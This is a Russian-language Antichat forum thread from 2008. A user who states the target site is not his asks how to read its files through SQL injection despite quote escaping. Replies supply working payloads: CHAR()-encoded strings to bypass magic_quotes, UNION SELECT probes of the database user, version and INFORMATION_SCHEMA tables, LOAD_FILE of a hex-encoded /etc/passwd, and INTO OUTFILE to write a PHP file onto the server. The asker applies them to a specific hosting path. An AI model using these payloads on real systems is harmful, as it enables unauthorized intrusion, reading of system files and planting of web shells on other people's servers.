ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.12.2008, 21:12
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
файлы на сервер
доброго вам дня 
я хачю у вас просить чтобы вы мне расказали как можна узнати какие файлы на фтп через sql inject если тама сидит филитар на кавычки?
извините за мой рускии... |
|
|
13.12.2008, 11:14
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
ребят но помогите пожалуйста... я сделал через file_load('') но мне показавает
 это филитар на кавычки  как мне его обаити скажите плз |
|
|
|
13.12.2008, 11:19
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 278
Провел на форуме:
1495545
Репутация:
242
|
|
На сколько я понял все кавычки экранируются слэшем, т.е. " ' " заменяется на " \' ".
magic_quotes ON
|
|
|
|
13.12.2008, 11:30
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
да ты правилина понел, да но это не мои сайт, я хачю пасматрети на нём какие фаилы потому что не магу наити один файл... как мне обайти?
|
|
|
|
13.12.2008, 11:33
|
|
Постоянный
Регистрация: 12.04.2008
Сообщений: 403
Провел на форуме:
4700216
Репутация:
261
|
|
какой сайт где ссылка?
|
|
|
|
13.12.2008, 11:39
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 278
Провел на форуме:
1495545
Репутация:
242
|
|
используй
char и обратные кавычки
SELECT * FROM `user` where `login`= char(39,32,111,114,32,49,32,47,42);
|
|
|
|
13.12.2008, 11:55
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
да но всё это мне надо написати sql inject и чтобы мне показала file_load
PHP код:
script.php?id=-1+union+select+char(39,32,111,114,32,49,32,47,42)/*
но мне это показывает что я написал в char, а мне нужна чтобы делал запрос на сервер чтобы показал файлы которые в сайте..
Последний раз редактировалось downloader; 13.12.2008 в 11:59..
|
|
|
|
13.12.2008, 12:17
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 278
Провел на форуме:
1495545
Репутация:
242
|
|
Для начала
script.php?id=-1+union+select+user()/*
script.php?id=-1+union+select+version()/*
script.php?id=-1+union+select+database()/*
script.php?id=-1+union+select+table_name+from+INFORMATION_SCHEMA. TABLES/*
потом пробуй
прочитать файл(нужно знать путь до него)
script.php?id=-1+union+select+LOAD_FILE(0x276574632f7061737377642 f)/*
записать в файл
script.php?id=-1+union+select+0xКОДИРОВАННАЯСТРО А+into+outfile+'/tmp/aaa.php'/*
где 0x276574632f7061737377642f это
"0х" - преффикс HEX
"276574632f7061737377642f" = "'etc/passwd'"
(http://www.string-functions.com/string-hex.aspx)
p.s. пробелы лишние убери.
Последний раз редактировалось preda1or; 13.12.2008 в 12:23..
|
|
|
|
13.12.2008, 12:32
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Не факт вообще, что есть возможность просматривать файлы.
|
|
|
|
13.12.2008, 12:39
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
preda1or спасибо тебе за то что помагаеш..
вот я паставил в hex
PHP код:
/home/content/r/o/b/robbstudio/html/
получиласи
PHP код:
2f686f6d652f636f6e74656e742f722f6f2f622f726f626273747564696f2f68746d6c2f
урл получился такой:
PHP код:
script?id=-1+union+select+LOAD_FILE(0x2f686f6d652f636f6e74656e742f722f6f2f622f726f626273747564696f2f68746d6c2f)/*
но мне пути не показавает, ести ишё методы чтобы видить файлы на сервер?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
